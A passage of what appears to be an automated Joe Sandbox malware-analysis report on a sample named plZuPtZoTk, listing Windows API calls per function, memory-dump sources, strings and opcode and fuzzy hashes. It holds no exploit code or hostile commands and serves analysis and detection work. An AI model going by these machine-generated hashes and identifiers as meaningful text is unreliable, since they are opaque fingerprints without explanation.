                                                                      • GetLastError.KERNEL32(?,009F301A,009C13C6,00000000,00000000,00000000,?,009F328B,00000006,FlsSetValue,00A62290,FlsSetValue,00000000,00000364,?,009F2E46), ref: 009F30B1
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009F301A,009C13C6,00000000,00000000,00000000,?,009F328B,00000006,FlsSetValue,00A62290,FlsSetValue,00000000), ref: 009F30BF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 3177248105-0
                                                                      • Opcode ID: def06930bae7c9bc035dadeac535e5b8581610d486d9ed16488bbf98aa0125df
                                                                      • Instruction ID: 6741bf9b2f76b311de09ce1dc1edfa253a8c96ae5dea70b50ca2e3fdc5bb85ba
                                                                      • Opcode Fuzzy Hash: def06930bae7c9bc035dadeac535e5b8581610d486d9ed16488bbf98aa0125df
                                                                      • Instruction Fuzzy Hash: E101D83230132AAFC7218BB99C44D7B7B9CAF05BB1B188621FA05D7240CF29D942C7D0
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00A2747F
                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00A27497
                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00A274AC
                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00A274CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      • Opcode ID: 0bb02f8018af937454bab496cc20fe8e2303b127a92607345e33036bc488c95a
                                                                      • Instruction ID: 33e0688b32da5d8e3073ff50f1e0d2e8860b477e33b26092a152a3ac3a889448
                                                                      • Opcode Fuzzy Hash: 0bb02f8018af937454bab496cc20fe8e2303b127a92607345e33036bc488c95a
                                                                      • Instruction Fuzzy Hash: 0611A1B52053209FE720DF58EC08F9A7BFCFB00B10F508569E616D6151D770EA04DB51
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A2ACD3,?,00008000), ref: 00A2B0C4
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A2ACD3,?,00008000), ref: 00A2B0E9
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00A2ACD3,?,00008000), ref: 00A2B0F3
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A2ACD3,?,00008000), ref: 00A2B126
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CounterPerformanceQuerySleep
                                                                      • String ID:
                                                                      • API String ID: 2875609808-0
                                                                      • Opcode ID: cbe4695100f90a721e806e71f1b197a43d03281d4b3e5a264f8491769f5d1d69
                                                                      • Instruction ID: 96b5ff0bc261e185d36605a8ea8056466a0dde03870baf9cf1df8f1f67977091
                                                                      • Opcode Fuzzy Hash: cbe4695100f90a721e806e71f1b197a43d03281d4b3e5a264f8491769f5d1d69
                                                                      • Instruction Fuzzy Hash: 88116131C11A3DDBCF00EFE8E9686EEBB78FF49711F1042A5D941B2145CB3055518B61
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A22DC5
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A22DD6
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00A22DDD
                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00A22DE4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 2710830443-0
                                                                      • Opcode ID: d99e7b4b3a7d4e7e193922e3fca184f4f7342a363bfdfcb7a9a6e6e1c70aba9c
                                                                      • Instruction ID: 7f27a3bbb1a0d8a053f925f5935f1e4a0a002ab57013acd4c39165847751b4f9
                                                                      • Opcode Fuzzy Hash: d99e7b4b3a7d4e7e193922e3fca184f4f7342a363bfdfcb7a9a6e6e1c70aba9c
                                                                      • Instruction Fuzzy Hash: 1CE06D721013347BD7205BB6AC0DFEB7E6CFB42BB2F001125F105D10809AA4CA42C6B0
                                                                      APIs
                                                                        • Part of subcall function 009D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009D9693
                                                                        • Part of subcall function 009D9639: SelectObject.GDI32(?,00000000), ref: 009D96A2
                                                                        • Part of subcall function 009D9639: BeginPath.GDI32(?), ref: 009D96B9
                                                                        • Part of subcall function 009D9639: SelectObject.GDI32(?,00000000), ref: 009D96E2
                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00A58887
                                                                      • LineTo.GDI32(?,?,?), ref: 00A58894
                                                                      • EndPath.GDI32(?), ref: 00A588A4
                                                                      • StrokePath.GDI32(?), ref: 00A588B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                      • String ID:
                                                                      • API String ID: 1539411459-0
                                                                      • Opcode ID: 0c8d8ee6aa5b68e0c131a45f104404c5e26cd964817dda284cf01bc3f52d5e3b
                                                                      • Instruction ID: 90cf7f0431769ab17402854d9e1b1d6b4c1058c45676ace9914cca42e30a1d2a
                                                                      • Opcode Fuzzy Hash: 0c8d8ee6aa5b68e0c131a45f104404c5e26cd964817dda284cf01bc3f52d5e3b
                                                                      • Instruction Fuzzy Hash: 28F03A36141359BADB12AFD4AC09FCA3B59BF06362F448101FA21650E2CB795512CBA5
                                                                      APIs
                                                                      • GetSysColor.USER32(00000008), ref: 009D98CC
                                                                      • SetTextColor.GDI32(?,?), ref: 009D98D6
                                                                      • SetBkMode.GDI32(?,00000001), ref: 009D98E9
                                                                      • GetStockObject.GDI32(00000005), ref: 009D98F1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Color$ModeObjectStockText
                                                                      • String ID:
                                                                      • API String ID: 4037423528-0
                                                                      • Opcode ID: f434315db7bd961d119271a77df9d8de57594d3e172d80cdf7d08a082c4ff273
                                                                      • Instruction ID: 4c816f8f01f5e707a39922e1ca7152ea4ac340d0c48528d81efb35ce7b9fbf5e
                                                                      • Opcode Fuzzy Hash: f434315db7bd961d119271a77df9d8de57594d3e172d80cdf7d08a082c4ff273
                                                                      • Instruction Fuzzy Hash: 57E06D31284780AEDB219BB8BC09BEC3F21BB12336F04831AF6FA590E5C77146819B10
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 00A21634
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00A211D9), ref: 00A2163B
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A211D9), ref: 00A21648
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00A211D9), ref: 00A2164F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      • Opcode ID: 8bf9fc18626c2bbbb469ae7ef74d87280994652b83d119181dc5ce8af4a5fc26
                                                                      • Instruction ID: a76a1ff5f3d4df33130a93c056000f54d1734d6dd05f4ce71daf67d5e3a7c700
                                                                      • Opcode Fuzzy Hash: 8bf9fc18626c2bbbb469ae7ef74d87280994652b83d119181dc5ce8af4a5fc26
                                                                      • Instruction Fuzzy Hash: 66E04F71602321AFD7205BE4AD0DB8A3B68BF54BA6F144818F245C9084D6244542C750
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00A1D858
                                                                      • GetDC.USER32(00000000), ref: 00A1D862
                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A1D882
                                                                      • ReleaseDC.USER32(?), ref: 00A1D8A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: ddf7934fb3b4020db0549a93fa5b9d6d26f730ddef91f22cc808f9fe0a11a112
                                                                      • Instruction ID: 4be4d21fbc0f6dbd04f380a4dc43be617a09555b2bcd3e7efb75a27bb64860b1
                                                                      • Opcode Fuzzy Hash: ddf7934fb3b4020db0549a93fa5b9d6d26f730ddef91f22cc808f9fe0a11a112
                                                                      • Instruction Fuzzy Hash: FBE075B5800305DFCB419FE0D908A6DBBB5FB48722B149459E84AE7654C7385A42AF51
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00A1D86C
                                                                      • GetDC.USER32(00000000), ref: 00A1D876
                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A1D882
                                                                      • ReleaseDC.USER32(?), ref: 00A1D8A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: 639cffdfa0aaf890a08edde8c8646a85fc4a66e5ab42717b974f5e292efce43a
                                                                      • Instruction ID: dcd6af519eb08746324e0b7d1f4a7ca906c0b16251b2bb4430e4b906990f6394
                                                                      • Opcode Fuzzy Hash: 639cffdfa0aaf890a08edde8c8646a85fc4a66e5ab42717b974f5e292efce43a
                                                                      • Instruction Fuzzy Hash: E2E092B5C00304EFCF51EFE0E808A6DBBB5FB48722B149449E94AE7654CB385A02EF50
                                                                      APIs
                                                                        • Part of subcall function 009C7620: _wcslen.LIBCMT ref: 009C7625
                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00A34ED4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Connection_wcslen
                                                                      • String ID: *$LPT
                                                                      • API String ID: 1725874428-3443410124
                                                                      • Opcode ID: 77c0f2ff1f3b57ce1e3c034cf25edb6a4a0f9b5789383b93413b8dace1027f83
                                                                      • Instruction ID: 86f51391733095f67223552f7479db240d5d4ad67b1636f40c5d87a7679ff26f
                                                                      • Opcode Fuzzy Hash: 77c0f2ff1f3b57ce1e3c034cf25edb6a4a0f9b5789383b93413b8dace1027f83
                                                                      • Instruction Fuzzy Hash: 21915C75A002449FCB14DF58C484EAABBF1BF49704F188099F80A9F3A2D735EE85CB91
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 009EE30D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandling__start
                                                                      • String ID: pow
                                                                      • API String ID: 3213639722-2276729525
                                                                      • Opcode ID: 1c3f8216804f73f06b3116d5ca996e017889b7e8e6edb72e9bbcae8d09131a0b
                                                                      • Instruction ID: ed0c46b9fbf186df881965e9d0943752370137aa3330c368a9fc86ce2014b4ec
                                                                      • Opcode Fuzzy Hash: 1c3f8216804f73f06b3116d5ca996e017889b7e8e6edb72e9bbcae8d09131a0b
                                                                      • Instruction Fuzzy Hash: 2F51AF61A0C60A96CB13BB95CD01379BBACEB40740F304D59E1E5833F9EF348C929B46
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #
                                                                      • API String ID: 0-1885708031
                                                                      • Opcode ID: 15e6f394031c4341d8587ce65426b114123f17c58b26f14f05837dd9ce2c646a
                                                                      • Instruction ID: ea3c39bb60b016057d04d1f10528a3f4906bb1db1d142d59c3322704c9ea7b8d
                                                                      • Opcode Fuzzy Hash: 15e6f394031c4341d8587ce65426b114123f17c58b26f14f05837dd9ce2c646a
                                                                      • Instruction Fuzzy Hash: 7B514735940346DFEB15EF68C481AFA7BA8EF55310F24805AECA19F2D0D7349D82CB90
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 009DF2A2
                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 009DF2BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemorySleepStatus
                                                                      • String ID: @
                                                                      • API String ID: 2783356886-2766056989
                                                                      • Opcode ID: bac4a7fa71e966a6602821ca76fbb1835fde8bf81a4fb67fb048d39460869185
                                                                      • Instruction ID: 1d7311080420bc086890f101576d701f761cbda6c09f5d2dbd4f9585cbfc2269
                                                                      • Opcode Fuzzy Hash: bac4a7fa71e966a6602821ca76fbb1835fde8bf81a4fb67fb048d39460869185
                                                                      • Instruction Fuzzy Hash: 255114718087449BD320EF54DC86BABBBF8FBC4300F81885DF199411A5EB71956ACB67
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00A457E0
                                                                      • _wcslen.LIBCMT ref: 00A457EC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper_wcslen
                                                                      • String ID: CALLARGARRAY
                                                                      • API String ID: 157775604-1150593374
                                                                      • Opcode ID: 60937c6ce2115c08dab305585f7ab15a0a6ea77f550cdda66775b830199257f3
                                                                      • Instruction ID: 8fc7f7d4ed14c42ecda458320e2b2b44f0cb452f5c8448eeaae19606a60f3cc9
                                                                      • Opcode Fuzzy Hash: 60937c6ce2115c08dab305585f7ab15a0a6ea77f550cdda66775b830199257f3
                                                                      • Instruction Fuzzy Hash: 0D419275E002099FCB14EFB9C885ABEBBF5FF99324F104069E505A7252EB309D81DB90
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00A3D130
                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A3D13A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CrackInternet_wcslen
                                                                      • String ID: |
                                                                      • API String ID: 596671847-2343686810
                                                                      • Opcode ID: fcaf7a9d028674ff602d144c3d1ecf0a520a3910be1a1aed9544762b29b2d443
                                                                      • Instruction ID: 61c0a1de2d1b51bb44ecc876923b75b418ee522b01e49e9fa327a03b949d1924
                                                                      • Opcode Fuzzy Hash: fcaf7a9d028674ff602d144c3d1ecf0a520a3910be1a1aed9544762b29b2d443
                                                                      • Instruction Fuzzy Hash: C031F571D00209ABCF15EFA5DC85FEEBFB9FF45340F00011AF815A6166E631AA56CB61
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00A53621
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A5365C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DestroyMove
                                                                      • String ID: static
                                                                      • API String ID: 2139405536-2160076837
                                                                      • Opcode ID: 056c14e23beafd33fa66e4da3f593c9a35b3d4a2a6fdfdd176c0773fea3d87c0
                                                                      • Instruction ID: dd06020509e00acd2057dc61719bc3aa9d2cf086394f3c34abd483df9d3d1151
                                                                      • Opcode Fuzzy Hash: 056c14e23beafd33fa66e4da3f593c9a35b3d4a2a6fdfdd176c0773fea3d87c0
                                                                      • Instruction Fuzzy Hash: 65318B72100604AEDB10DF68DC80FBB73A9FF88761F10961DFCA597290DA30AD86DB60
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00A5461F
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A54634
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: '
                                                                      • API String ID: 3850602802-1997036262
                                                                      • Opcode ID: af35196d4b32341ab2cf54dba1c1887a84f4ae57f9854aecdd47c337538bff11
                                                                      • Instruction ID: 0fe4024e672451c5a890b9be6c8804c625a9ebc95896eef125c28fd956e7a760
                                                                      • Opcode Fuzzy Hash: af35196d4b32341ab2cf54dba1c1887a84f4ae57f9854aecdd47c337538bff11
                                                                      • Instruction Fuzzy Hash: 7E3118B4A0130AAFDB14CFA9C990BDA7BB5FF49305F14406AED05AB351E770A985CF90
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A5327C
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A53287
                                                                      Strings
                                                                      Memory Dump Source
